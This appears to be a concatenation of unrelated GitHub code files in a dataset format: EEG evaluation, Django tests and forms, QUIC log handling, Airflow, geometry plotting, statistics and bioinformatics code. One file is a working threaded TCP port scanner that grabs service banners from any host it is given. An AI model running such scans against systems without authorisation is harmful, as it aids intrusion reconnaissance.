log_dir + folder\n for folder in os.listdir(log_dir)\n if \"_\"+data_type in folder]\n checkpoint_dirs.sort()\n else:\n checkpoint_dirs = [log_dirs[0] + dir for dir in checkpoint_dirs]\n\n patient_paths = []\n for study_name in study_names:\n\n patient_path = studies_folder\\\n + '/'\\\n + study_name\\\n + '/'\\\n + data_type\\\n + '/'\\\n + task\\\n + '_'\\\n + str(length)\\\n + '_'\\\n + channels\\\n + '_'\\\n + str(artifact)\n\n if erp_degree is not None:\n patient_path += (\"_\" + str(erp_degree))\n\n if not os.path.isdir(patient_path):\n print(\"Configuration supplied was not found in study folder data.\")\n print(\"Failed:\", patient_path)\n raise FileNotFoundError\n sys.exit(3)\n\n patient_paths.append(patient_path)\n\n # Instantiate a 'Classifier' object\n myclf = ML.Classifier(data_type)\n\n # ============== Load All Studies' Data ==============\n for study_name, patient_path in zip(study_names, patient_paths):\n\n fnames = os.listdir(patient_path)\n # used for only loading in subset of subjects for evaluation\n if limited_subjects is not None:\n fnames = [fname for fname in fnames\n if fname[:config.participantNumLen] in limited_subjects]\n\n for fname in fnames:\n if \"_\"+filter_band in fname:\n myclf.LoadData(patient_path+\"/\"+fname)\n\n # fallback\n if fallback is True:\n # find unused subjects\n fallback_subs = {}\n # get translator path\n translator_file = open(\n studies_folder + \"/\" + study_name\\\n + \"/\" + \"translator_\"+task+\".txt\",\n 'r')\n for line in translator_file.readlines():\n subject_k = line.strip('\\n').split('\\t')[-1]\n if subject_k not in myclf.subjects:\n fallback_subs[subject_k] = None\n\n print(\"Fallback 1 subjects:\", fallback_subs.keys())\n\n # get path of one it looser 
artifact study folder\n fallback_patient_path = patient_path.replace(str(artifact), '1')\n # and its fnames that contain fallback subs\n fnames = [fname for fname in os.listdir(fallback_patient_path) if\\\n fname[:config.participantNumLen] in fallback_subs]\n for fname in fnames:\n if \"_\"+filter_band in fname:\n myclf.LoadData(fallback_patient_path+\"/\"+fname)\n fallback_subs[fname[:config.participantNumLen]] = 1\n\n # # find unused subjects\n # fallback_subs = {}\n # # get translator path\n # translator_file = open(\n # studies_folder + \"/\" + study_name\\\n # + \"/\" + \"translator_\"+task+\".txt\",\n # 'r')\n # for line in translator_file.readlines():\n # subject_k = line.strip('\\n').split('\\t')[-1]\n # if subject_k not in myclf.subjects:\n # fallback_subs[subject_k] = None\n\n print(\"Fallback 2 subjects:\", fallback_subs.keys())\n\n # get path of one it looser artifact study folder\n fallback_patient_path = patient_path.replace(str(artifact), '2')\n # and its fnames that contain fallback subs\n fnames = [fname for fname in os.listdir(fallback_patient_path) if\\\n fallback_subs[fname[:config.participantNumLen]] is None]\n for fname in fnames:\n if \"_\"+filter_band in fname:\n myclf.LoadData(fallback_patient_path+\"/\"+fname)\n fallback_subs[fname[:config.participantNumLen]] = 2\n\n #\n # if combine is not True:\n #\n # for checkpoint_dir in checkpoint_dirs:\n #\n # label_names=checkpoint_dir.split('_')[7:]\n # label_values=[]\n # for group in label_names:\n # for key, value in config.group_names.items():\n # if group == value:\n # label_values.append(key)\n #\n # myclf.Prepare(\n # tt_split=1,\n # labels=label_values,\n # normalize=normalize,\n # eval=True)\n #\n # if data_type == 'spectra':\n # if plot_spectra is True:\n # specavgObj = SpectralAverage(myclf)\n # specavgObj.plot(\n # fig_fname=checkpoint_dir+\"/\"\n # + study_name\n # + \"_true_\"\n # + str(datetime.now().strftime(\"%H-%M-%S\")))\n #\n # y_preds = myclf.eval_saved_CNN(\n # checkpoint_dir,\n # plot_hist=plot_hist,\n # plot_conf=plot_conf,\n # plot_3d_preds=plot_3d_preds,\n # fname=study_name,\n # # pred_level=pred_level,\n # save_results=True)\n #\n # for i, (pred, inputObj) in enumerate(\n # zip(np.rint(y_preds), myclf.data)):\n #\n # inputObj.group = myclf.groups[int(np.argmax(pred))]\n #\n # if data_type == 'spectra':\n # if plot_spectra is True:\n # specavgObj = SpectralAverage(myclf)\n # specavgObj.plot(\n # fig_fname=checkpoint_dir+\"/\"\n # + study_name\n # + \"_pred_\"\n # + str(datetime.now().strftime(\"%H-%M-%S\")))\n\n # if combine is True:\n for checkpoint_dir in checkpoint_dirs:\n\n label_names=checkpoint_dir.split('_')[7:]\n label_values=[]\n for group in label_names:\n for key, value in config.group_names.items():\n if group == value:\n label_values.append(key)\n\n myclf.Prepare(\n tt_split=1,\n labels=label_values,\n normalize=normalize,\n eval=True)\n\n if data_type == 'spectra':\n if plot_spectra is True:\n specavgObj = SpectralAverage(myclf)\n specavgObj.plot(\n fig_fname=checkpoint_dir+\"/\"\n + study_name\n + \"_true_\"\n + str(datetime.now().strftime(\"%H-%M-%S\")))\n\n y_preds = myclf.eval_saved_CNN(\n checkpoint_dir,\n plot_hist=plot_hist,\n plot_conf=plot_conf,\n plot_3d_preds=plot_3d_preds,\n fname=(study_name + \"_\"+str(artifact)) if limited_subjects is not None\\\n else study_name,\n # pred_level=pred_level,\n save_results=True,\n fallback_list=None if fallback is False else fallback_subs)\n\n # TODO:\n # broken, can't change label here for combination runs\n # for i, (pred, inputObj) 
in enumerate(\n # zip(np.rint(y_preds), myclf.data)):\n #\n # inputObj.group = myclf.groups[int(np.argmax(pred))]\n\n # if data_type == 'spectra':\n # if plot_spectra is True:\n # specavgObj = SpectralAverage(myclf)\n # specavgObj.plot(\n # fig_fname=checkpoint_dir+\"/\"\n # + study_name\n # + \"_pred_\"\n # + str(datetime.now().strftime(\"%H-%M-%S\")))\n\nif __name__ == '__main__':\n main()\n","repo_name":"canlab/WAViMedEEG","sub_path":"scripts/Run_eval_saved_model.py","file_name":"Run_eval_saved_model.py","file_ext":"py","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"28027459246","text":"from django.test import TestCase\nfrom catalog import models as cmod\nfrom decimal import Decimal\nimport json as json\n\nclass FomoUserTestCase(TestCase):\n\n def test_create_a_unique_product(self):\n ## Will create a category and a unique product, then make sure the values saved and that we have access to those values\n ## Assumptions\n # User would be logged in\n # User would have the permissions to create a product\n\n # Create a category\n cat5 = cmod.Category()\n cat5.codename = 'st'\n cat5.name = 'Strings'\n cat5.save()\n\n # Create a Unique Product\n p1 = cmod.UniqueProduct()\n p1.product = p1\n p1.serial_number = '1234asdf'\n p1.name = 'Violin'\n p1.category = cat5\n p1.price = Decimal('250.99')\n dList = ['Violin hand made in 1456', 'Played be Bach and Beethoved', 'Korys favorite instrument']\n p1.descriptionList = json.dumps(dList)\n iList = ['/static/homepage/media/img/violin.jpg', '/static/homepage/media/img/violin2.png', '/static/homepage/media/img/violin3.jpg', '/static/homepage/media/img/thumbnail_violin.jpg']\n p1.imgList = json.dumps(iList)\n p1.save()\n\n p2 = cmod.Product.objects.get(id=p1.id)\n self.assertEquals(p2.serial_number, '1234asdf')\n self.assertEquals(p2.name, 'Violin')\n self.assertEquals(p2.category, cat5)\n self.assertEquals(p2.price, Decimal('250.99'))\n self.assertEquals(p2.descriptionList, json.dumps(dList))\n self.assertEquals(p2.imgList, json.dumps(iList))\n\n def test_create_a_Bulk_Product(self):\n ## Will create a category and a Bulk product, then make sure the values saved and that we have access to those values\n ## Assumptions\n # User would be logged in\n # User would have the permissions to create a product\n\n # Create a category\n cat4 = cmod.Category()\n cat4.codename = 'ac'\n cat4.name = 'Accessories'\n cat4.save()\n\n # Create a Bulk Product\n p3 = cmod.BulkProduct()\n p3.name = 'Sheet Music 1'\n p3.category = cat4\n p3.price = Decimal('9.50')\n p3.quantity = 20\n p3.reorder_trigger = 5\n p3.reorder_quantity = 30\n dList = ['Holy sheet music', 'From Beethoven to T-swizzle']\n p3.descriptionList = json.dumps(dList)\n iList = ['/static/homepage/media/img/sh1.jpg', '/static/homepage/media/img/sh2.jpg', '/static/homepage/media/img/sh3.png']\n p3.imgList = json.dumps(iList)\n p3.save()\n\n p4 = cmod.Product.objects.get(id=p3.id)\n self.assertEquals(p4.name, 'Sheet Music 1')\n self.assertEquals(p4.category, cat4)\n self.assertEquals(p4.price, Decimal('9.50'))\n self.assertEquals(p4.descriptionList, json.dumps(dList))\n self.assertEquals(p4.imgList, json.dumps(iList))\n self.assertEquals(p4.quantity, 20)\n self.assertEquals(p4.reorder_quantity, 30)\n self.assertEquals(p4.reorder_trigger, 5)\n\n # to Run\n # python3 manage.py test catalog/tests/ 
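The commented-out mapping in the script above (myclf.groups[int(np.argmax(pred))]) is the standard way to turn softmax-style network outputs back into group labels. A minimal sketch with hypothetical class names and scores:

import numpy as np

groups = ["control", "condition"]              # hypothetical label names
y_preds = np.array([[0.9, 0.1], [0.2, 0.8]])   # one row of scores per subject
labels = [groups[int(np.argmax(p))] for p in y_preds]
print(labels)                                  # ['control', 'condition']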
test_product\n\n\n","repo_name":"adamsonb12/fomo","sub_path":"fomo/catalog/tests/test_product.py","file_name":"test_product.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33297075102","text":"import json, os, re\nimport subprocess\nfrom metriccalculator import MetricCalculator\n\nclass FileManager:\n \n def __init__(self):\n print(\"\")\n self.serverqlog = \"\"\n\n def addTestInfo(self, testlogdir: str, scenario: str, clientpars: str, serverpars: str, clientname: str, servername: str, simulation: str):\n regex = re.compile(\"^(?![cs][lv]_).+\\.qlog\")\n files = []\n # find qlog files\n for dirpath, dirnames, filenames in os.walk(testlogdir):\n for f in filenames:\n if regex.match(f):\n files.append(os.path.join(dirpath, f))\n\n for qlog in files:\n self.updateFile(\n qlog, \n scenario, \n simulation, \n clientpars, \n serverpars, \n clientname, \n servername,\n True if \"client\" in qlog or \"clnt\" in qlog else False\n )\n\n def updateFile(self, file: str, scenario: str, simulation: str, clparams: str, svparams: str, client: str, server: str, vantageclient: bool):\n newdata_file = {}\n commit = \"\"\n\n split_path = file.split(sep=\"/\")\n sep =\"/\"\n\n # read used version (commit) of client/server\n if vantageclient:\n split_path[len(split_path) - 1] = \"cl_commit.txt\"\n commitpath = sep.join(split_path)\n with open(commitpath, \"r\") as commitfile:\n commit = commitfile.read()\n os.remove(commitpath)\n else:\n split_path[len(split_path) - 1] = \"sv_commit.txt\"\n commitpath = sep.join(split_path)\n with open(commitpath, \"r\") as commitfile:\n commit = commitfile.read()\n os.remove(commitpath)\n\n commit = commit.replace('\\n', '')\n # create summary field for qlog\n newdata_file[\"summary\"] = {\n \"commit\": commit,\n \"simulation\": simulation,\n \"scenario\": scenario,\n \"client\": client,\n \"client_params\": clparams,\n \"server\": server,\n \"server_params\": svparams\n }\n # Load in qlog file\n with open(file, \"r\") as qlog_file:\n data = qlog_file.read().lstrip()\n try:\n data_file = json.loads(data)\n except json.JSONDecodeError as err:\n print(\"Parsing qlog file error: \" + err)\n return\n for key in data_file:\n if key != \"summary\":\n newdata_file[key] = data_file[key]\n\n # remove and replace qlog file with new name\n os.remove(file)\n newfilename = \"\"\n if vantageclient:\n newfilename = \"cl_\"\n else:\n newfilename = \"sv_\"\n newfilename += simulation + \"_\"\n newfilename += client + \"_\" + server + \".qlog\"\n\n split_path[len(split_path) - 1] = newfilename\n newpath = sep.join(split_path)\n\n if not vantageclient:\n self.serverqlog = newpath\n\n with open(newpath, \"w\") as qlog_file:\n json.dump(newdata_file, qlog_file)\n\n def pcaptojson(self, logdir: str, sim: str, met_calc: MetricCalculator, isquic: bool, run: int):\n # user wireshark docker image to convert pcap to json\n convertcmd = \"docker run --env SIM=\" + sim + \" -v \" + logdir + \":/logs:rw qtest-tshark\"\n r = subprocess.run(convertcmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n regex = re.compile(\"^(?![cs][lv]_).+\\.json\")\n jsonfiles = []\n # find converted pcap files\n for dirpath, dirnames, filenames in os.walk(logdir):\n for f in filenames:\n if regex.match(f):\n jsonfiles.append(os.path.join(dirpath, f))\n \n pcapfile = open(jsonfiles[0], 'r').read()\n decrypterrors = pcapfile.count(\"quic.decryption_failed\")\n\n # If too many decryption errors, re-run 
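updateFile above relies on a small trick to force the new summary block to be the first key of the rewritten qlog: since Python 3.7, dicts preserve insertion order, so building a fresh dict with "summary" first and copying every other key after it fixes the on-disk ordering. A minimal sketch with synthetic data (the field values are illustrative):

import json

data = {"qlog_version": "draft-02", "traces": [], "summary": {"stale": True}}
summary = {"commit": "abc123", "simulation": "demo"}

reordered = {"summary": summary,
             **{k: v for k, v in data.items() if k != "summary"}}
print(json.dumps(reordered))  # "summary" serializes first, stale copy dropped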
test\n if decrypterrors < 200:\n met_calc.calculateMetrics(logdir, jsonfiles, self.serverqlog, True, isquic, sim, run)\n \n # remove converted pcap files\n for jsonfile in jsonfiles:\n os.remove(jsonfile) \n self.serverqlog = \"\"\n\n return (decrypterrors < 200)","repo_name":"moonfalir/quicSim-docker","sub_path":"qtest/filemanager.py","file_name":"filemanager.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"32558858517","text":"# Define a new pull_sales task\npull_sales = BashOperator(\n task_id='pullsales_task',\n bash_command='wget https://salestracking/latestinfo?json',\n dag=analytics_dag\n)\n\n# Set pull_sales to run prior to cleanup\npull_sales >> cleanup\n\n# Configure consolidate to run after cleanup\ncleanup >> consolidate\n\n# Set push_data to run last\nconsolidate >> push_data","repo_name":"skupriienko/Datacamp-Python-Exercises","sub_path":"Data-Engenering/Introduction to Airflow in Python/Implementing Airflow DAGs/4_Define order of BashOperators.py","file_name":"4_Define order of BashOperators.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"86"} +{"seq_id":"70779693086","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import get_user_model\n\n\nUser = get_user_model()\n\n\nclass CreationForm(UserCreationForm): \n class Meta(UserCreationForm.Meta):\n model = User \n fields = ('first_name', 'last_name', 'username', 'email') \n \n def clean(self):\n cleaned_data = super().clean()\n if User.objects.filter(email=cleaned_data.get('email')).exists():\n self.add_error('email', \"Эта почта уже зарегестрированна\")\n return cleaned_data","repo_name":"Denis-Guselnikov/account_wallet","sub_path":"wallet/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"8639308521","text":"import os\nfrom socket import *\nfrom threading import *\nfrom colorama import Fore\nscreenLock = Semaphore(value=1)\ndef connScan(tgtHost,tgtPort):\n try:\n conn=socket(AF_INET,SOCK_STREAM)\n conn.connect((tgtHost,tgtPort))\n conn.send('hello world\\r\\n'.encode(\"utf-8\")) #发送测试信息给端口\n results=conn.recv(100) #接收主机返回的信息\n screenLock.acquire() #加锁\n print(Fore.GREEN+'[OPEN]{0}/tcp '.format(tgtPort)+Fore.WHITE+results.decode(\"utf-8\"))\n conn.close()\n except Exception:\n screenLock.acquire()\n #print(e)\n #print(Fore.WHITE+'[CLOSE]%d/tcp'% tgtPort)\n finally:\n screenLock.release() #释放锁\n conn.close()\ndef portScan(tgtHost,tgtPorts):\n print(Fore.BLUE+\"[LOAD]正在解析IP\",end=\" \")\n try:\n tgtIP=gethostbyname(tgtHost) ##获得对应主机的ip地址\n print(Fore.WHITE+'')\n except Exception as e:\n print(Fore.RED+\"[ERROR]不能解析%s的IP {0}\".format(e) %tgtHost)\n \n try:\n Name=gethostbyaddr(tgtIP) ##获得ip对应主机的信息\n print (Fore.YELLOW+\"\\n[INFO]主机信息:\"+Name[0])\n except:\n print (Fore.YELLOW+\"\\n[INFO]主机IP\"+tgtIP)\n\n setdefaulttimeout(1)\n for Port in tgtPorts:\n t = Thread(target=connScan,args=(tgtHost,int(Port)))\n t.start()\n return\n \ndef main(Host,Ports):\n portScan(Host,Ports)\nif __name__=='__main__':\n if os.name == 'nt':\n os.system(\"cls\")\n else:\n os.system(\"clear\")\n print(Fore.LIGHTCYAN_EX+\"_______________|_____________>..]>\"\n \"\\n|liuyyds私藏端口扫描器v1.0(Beta)||>>> - · · >\"\n \"\\n|Author:liusuxy|___________/-->.>->\"\n \"\\n|##|->| || |_||| || || 
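The BashOperator record above wires dependencies with the bitshift operators; the same chain can be declared in one expression. A hedged sketch — import paths and the schedule keyword differ across Airflow versions (older releases use schedule_interval and airflow.operators.bash_operator), and the DAG/task names here are hypothetical:

from datetime import datetime
from airflow import DAG
from airflow.operators.bash import BashOperator

with DAG("demo_etl", start_date=datetime(2024, 1, 1), schedule=None) as dag:
    pull = BashOperator(task_id="pull", bash_command="echo pull")
    clean = BashOperator(task_id="clean", bash_command="echo clean")
    push = BashOperator(task_id="push", bash_command="echo push")

    pull >> clean >> push  # equivalent to the three separate >> statements above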
||\")\n tgt_host = str(input(Fore.LIGHTMAGENTA_EX+\"|URL of target|->\"))\n #ip_list = str(input(Fore.LIGHTMAGENTA_EX+\"|Port(s) of list|->\")).split(\",\")\n #################################################\n ip_list = [80,443,22,21,4444] #这里设置端口扫描列表\n #################################################\n main(tgt_host,ip_list)\n \n","repo_name":"liusuxyds/MyPortScanner","sub_path":"MyPortScanner1.0(Beta).py","file_name":"MyPortScanner1.0(Beta).py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74577069083","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg as LA\nimport sys #for path to external scripts\nsys.path.insert(0,'/sdcard/FWC/module-1/trunk/matrices/CoordGeo') #path to my scripts\n#local imports\nfrom line.funcs import *\nfrom triangle.funcs import *\nfrom conics.funcs import circ_gen \nimport subprocess \nimport shlex\n\n#Input parameters\nA=np.array([2,1])\nb=4.5\nc=-6\nM=np.array(([1,-1]))\no=0\ne1=np.array(([1,0]))\nO=np.array([0,0])\nP = np.array([1.5,1.5])\nQ = np.array([-2,-2])\n\nD=abs(b/c)\nprint(\"ratio=\",D)\nomat=np.array(([0,1],[-1,0]))\n\n#Direction vectors\nm1=omat@A\nm2=omat@A\nm3=omat@M\n\n#Points on the lines\nx1=b/(A@e1)\nA1=x1*e1\nx2=c/(A@e1)\nA2=x2*e1\nx3=o/(M@e1)\nB1=x3*e1\n\n#Generating all lines\nk1=-2\nk2=2\n\nx_AB = line_dir_pt(m1,A1,k1,k2)\nx_CD = line_dir_pt(m2,A2,k1,k2)\nx_EF = line_dir_pt(m3,B1,k1,k2)\n\n#Plotting line\nplt.plot(x_AB[0,:],x_AB[1,:])\nplt.plot(x_CD[0,:],x_CD[1,:])\nplt.plot(x_EF[0,:],x_EF[1,:])\n\n#Labelling the coordinates \ntri_coords = np.vstack((O,P,Q)).T\n\n#tri_coords=x.T\n\nplt.scatter(tri_coords[0,:], tri_coords[1,:])\nvert_labels = ['O','P','Q'] \nfor i, txt in enumerate(vert_labels):\n plt.annotate(txt,\n (tri_coords[0,i],tri_coords[1,i]),\n textcoords=\"offset points\",\n xytext=(0,10),\n ha='center')\n\nplt.xlabel('$x$')\nplt.ylabel('$y$')\n\nplt.grid()\nplt.axis('equal')\n\n#for termux\nplt.savefig('/sdcard/FWC/module-1/trunk/matrices/line_assignment/line.pdf')\n#subprocess.run(shlex.split(\"termux-open /sdcard/fwc/Divya/line.pdf\"))\n#else\n#plt.show()\n","repo_name":"DivyaSai9621/FWC","sub_path":"line_assignment/assign.py","file_name":"assign.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13899167741","text":"true = 0\ncounter = 232500000\n\nwhile counter < 232800000:\n for i in range(2, 19):\n #not divisible by 1-20? try next\n if (counter % i != 0):\n break\n #fully divisible? 
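The omat matrix in the line-geometry record above is a 90-degree rotation, which is how the script turns a line's normal vector into its direction vector. A minimal check (the vector [2, 1] is the script's own A; the dot-product check is added for illustration):

import numpy as np

omat = np.array([[0, 1], [-1, 0]])  # rotate by 90 degrees
n = np.array([2, 1])                # normal vector of the line 2x + y = const
m = omat @ n                        # direction vector along the line
print(m)                            # [ 1 -2]
print(n @ m)                        # 0 -> perpendicular, as required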
show number\n if i == 19:\n true = 1\n print(counter)\n break\n counter += 1","repo_name":"volkerha/DT211-3-Cloud","sub_path":"euler/e5.py","file_name":"e5.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"24872772623","text":"#!/usr/bin/env python\nimport numpy as np\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.cluster import AffinityPropagation\n\n\ndef distance_weighted_ave(x, dist):\n dm = dist.mean()\n i = dm[dm < 5e5].index\n dist = dist.loc[i, i]\n w = np.exp(- (dist / dist.mean().mean()) ** 2).replace(1, 0)\n d, w = x.align(w, axis=1, level='station')\n w.fillna(0, inplace=True)\n n = d.std()\n d = (d - d.mean()) / n\n v = d.fillna(0).dot(w.T) / d.notnull().astype(float).dot(w.T)\n return v.mul(n, axis=1, level='station')\n\nclass Blocks(object):\n def __init__(self, cluster_obj, **kwargs):\n \"\"\"\n Example usage:\n B = Blocks(DecisionTreeClassifier, min_samples_leaf = 1000)\n B = Blocks(AffinityPropagation)\n B = Blocks(AffinityPropagation, preference = -4)\n\n B.compute(x)\n B.regress(y)\n \"\"\"\n self.cl = cluster_obj(**kwargs)\n\n @staticmethod\n def indexer(notnull):\n d = {}\n for i, r in enumerate(notnull):\n try:\n d[tuple(r)].append(i)\n except KeyError:\n d[tuple(r)] = [i]\n return d\n\n def compute(self, x):\n self.X = x\n n = x.notnull().astype(int)\n if isinstance(self.cl, DecisionTreeClassifier):\n t = np.array(x.index, dtype='datetime64[m]', ndmin=2).astype(float).T\n self.dict = self.indexer(n.apply(lambda c: self.cl.fit(t, c).predict(t), 0).values)\n else:\n k, v = zip(*self.indexer(n.values).items())\n self.z = zip(v, self.cl.fit_predict(k))\n self.dict = {}\n for i, j in self.z:\n J = tuple(self.cl.cluster_centers_[j, :])\n try:\n self.dict[J].extend(i)\n except KeyError:\n self.dict[J] = i\n self.blocks = [x.iloc[i, np.array(c, dtype=bool)].dropna(1, 'all')\n for c, i in self.dict.items()]\n\n def check(self):\n \"\"\"Returns a pandas.DataFrame of same shape as original data, with clustered 1-0 arrangement corresponding to original missing value matrix.\"\"\"\n b = pd.DataFrame(columns = self.X.columns)\n for k, v in self.dict.items():\n J = np.array(k, ndmin=2).repeat(len(v), 0)\n b = b.append(pd.DataFrame(J, columns=self.X.columns, index=self.X.index[v]))\n return b\n\n def regression(self, x, y):\n x0 = x.fillna(0)\n x0[1] = 1\n b = np.linalg.lstsq(x0, y.loc[x.index].values.flatten())[0]\n self.b.append(pd.Series(b[:-1], index=x.columns))\n self.c.append(len(x))\n return x0.dot(b.reshape((-1, 1)))\n\n def regress(self, y, x=None, blocks=True):\n y = y.dropna()\n if x is not None:\n self.compute(x.loc[y.index])\n self.b = []\n self.c = []\n if blocks:\n r = pd.concat([self.regression(b, y) for b in self.blocks]).sort_index()\n else:\n r = self.regression(pd.concat(self.blocks, 1).sort_index(), y)\n r = pd.DataFrame(r)\n if isinstance(y, pd.Series):\n r.columns = pd.MultiIndex.from_tuples([y.name], names = x.columns.names)\n else:\n r.columns = y.columns\n return r\n\n\nif __name__ == \"__main__\":\n import binning, data\n\n D = data.Data()\n D.open('r','s_raw.h5')\n X = binning.bin(D.r).xs('avg', 1, 'aggr')\n X = X - X.mean()\n\n y = X.xs('3', 1, 'station', False).iloc[:,0].dropna()\n x = X.drop(y.name, 1).loc[y.index]\n\n # b = tree_blocks(x)\n # a = block_predictors(x, b)\n # a0 = pd.concat(a, 1).fillna(0)\n # r1 = np.linalg.lstsq(a0, y)\n # r2 = pd.concat([regression(c, y) for c in a], 0).sort_index()\n # r3 = 
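The brute-force search above has a bug worth flagging: the loop runs for i in range(2, 19), so i never reaches 19 and the success branch can never fire — and it only tests divisors up to 18 rather than 20 in any case. Divisibility by every number in 1..20 is exactly the least common multiple of that range, which gives the answer directly. A minimal sketch (on Python 3.9+, math.lcm(*range(1, 21)) is a one-liner):

from functools import reduce
from math import gcd

def lcm(a, b):
    return a * b // gcd(a, b)

print(reduce(lcm, range(1, 21)))  # 232792560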
affinity_regression(x, y)\n","repo_name":"betaplane/cezanne","sub_path":"python/spatial_stats.py","file_name":"spatial_stats.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"41616551077","text":"from django.db import migrations\n\nfrom dnsmasq.constants import (SETTING_SERVER_SERVICE_NAME,\n SETTING_SERVER_USE_SUDO)\n\n\ndef insert_configuration_settings(apps, schema_editor):\n \"\"\"\n Insert some configuration settings\n \"\"\"\n # Don't import the Configuration model directly as it may be a newer\n # version than this migration expects.\n Setting = apps.get_model('dnsmasq', 'Setting')\n # Create configuration settings for server\n Setting.objects.create(\n name=SETTING_SERVER_SERVICE_NAME,\n description='Server service name',\n value='dnsmasq',\n is_active=True)\n Setting.objects.create(\n name=SETTING_SERVER_USE_SUDO,\n description='Use sudo to operate with server services',\n value='0',\n is_active=True)\n\n\ndef delete_configuration_settings(apps, schema_editor):\n \"\"\"\n Delete the configuration settings\n \"\"\"\n # Don't import the Configuration model directly as it may be a newer\n # version than this migration expects.\n Setting = apps.get_model('dnsmasq', 'Setting')\n settings = Setting.objects\n queryset = (settings.filter(name=SETTING_SERVER_SERVICE_NAME) |\n settings.filter(name=SETTING_SERVER_USE_SUDO))\n queryset.delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('website', '0002_setting_default_export_configuration'),\n ]\n\n operations = [\n migrations.RunPython(code=insert_configuration_settings,\n reverse_code=delete_configuration_settings),\n ]\n","repo_name":"muflone/django-dnsmasq","sub_path":"website/migrations/0003_setting_server.py","file_name":"0003_setting_server.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7541169821","text":"__author__ = 'Charles Van Goethem and Frederic Escudie'\n__copyright__ = 'Copyright (C) 2018 IUCT-O'\n__license__ = 'GNU General Public License'\n__version__ = '2.0.0'\n__email__ = 'escudie.frederic@iuct-oncopole.fr'\n__status__ = 'prod'\n\nimport os\nfrom jflow.component import Component\nfrom jflow.abstraction import MultiMap\nfrom weaver.function import ShellFunction\nfrom anacore.bed import BEDIO\n\n\nclass BamAreasToFastq (Component):\n\n def define_parameters(self, aln, targets, min_overlap=20, split_targets=False, R1=None, R2=None):\n # Parameters\n self.add_parameter(\"min_overlap\", \"A reads pair is selected only if this number of nucleotides of the target are covered by the each read.\", default=min_overlap, type=int)\n self.add_parameter(\"split_targets\", 'With this parameter each region has his own pair of outputted fastq.', default=split_targets, type=bool)\n\n # Input Files\n self.add_input_file_list(\"aln\", \"Pathes to alignment files (format: BAM).\", default=aln, required=True)\n self.add_input_file_list(\"R1\", \"The path to the inputted reads file (format: fastq).\", default=R1)\n self.add_input_file_list(\"R2\", \"The path to the inputted reads file (format: fastq).\", default=R2)\n self.add_input_file(\"targets\", \"The locations of areas to extract (format: BED). 
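The regression helper in the Blocks class above appends a constant column before calling np.linalg.lstsq, which is the usual way to fit an intercept with plain least squares. A minimal sketch on synthetic data (coefficients and noise scale are arbitrary):

import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(50, 2))
y = 3.0 * X[:, 0] - 1.5 * X[:, 1] + 0.5 + rng.normal(scale=0.01, size=50)

A = np.column_stack([X, np.ones(len(X))])  # last column fits the intercept
coef, *_ = np.linalg.lstsq(A, y, rcond=None)
print(coef.round(2))                       # ~ [ 3.  -1.5  0.5]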
The position of the interests areas are extracted from column 7 (thickStart) and column 8 (thickEnd) if they exist otherwise they are extracted from column 2 (Start) and column 3 (End).\", default=targets, required=True)\n if len(self.R1) != len(self.R2):\n raise Exception(\"R1 and R2 list must have the same length.\")\n if not self.split_targets:\n self.repeated_targets = [self.targets for elt in self.aln]\n else:\n self.splitted_targets = self.get_splitted_pathes()\n self.repeated_aln = list()\n self.repeated_R1 = list()\n self.repeated_R2 = list()\n self.repeated_targets = list()\n for curr_idx, curr_aln in enumerate(self.aln):\n for curr_split in self.splitted_targets:\n self.repeated_aln.append(curr_aln)\n self.repeated_targets.append(curr_split)\n if len(self.R1) > 0 and len(self.R2) > 0:\n self.repeated_R1.append(self.R1[curr_idx])\n self.repeated_R2.append(self.R2[curr_idx])\n\n # Output Files\n if not self.split_targets:\n self.add_output_file_list(\"out_R1\", \"Pathes to the outputted R1 file (format: fastq).\", pattern='{basename_woext}_R1.fastq.gz', items=self.aln)\n self.add_output_file_list(\"out_R2\", \"Pathes to the outputted R2 file (format: fastq).\", pattern='{basename_woext}_R2.fastq.gz', items=self.aln)\n self.add_output_file_list(\"stderr\", \"Pathes to the stderr files (format: txt).\", pattern='{basename_woext}.stderr', items=self.aln)\n else:\n splitted_prefixes = self.get_splitted_prefixes()\n self.add_output_file_list(\"out_R1\", \"Pathes to the outputted R1 file (format: fastq).\", pattern='{basename_woext}_R1.fastq.gz', items=splitted_prefixes)\n self.add_output_file_list(\"out_R2\", \"Pathes to the outputted R2 file (format: fastq).\", pattern='{basename_woext}_R2.fastq.gz', items=splitted_prefixes)\n self.add_output_file_list(\"stderr\", \"Pathes to the stderr files (format: txt).\", pattern='{basename_woext}.stderr', items=splitted_prefixes)\n\n\n def get_splitted_prefixes(self):\n prefixes = list()\n targets_name = self.get_targets_name()\n for curr_aln in self.aln:\n if curr_aln.endswith(\".gz\") or curr_aln.endswith(\".bz\"):\n curr_aln = curr_aln[:-3]\n curr_aln = os.path.splitext(os.path.basename(curr_aln))[0]\n for curr_name in 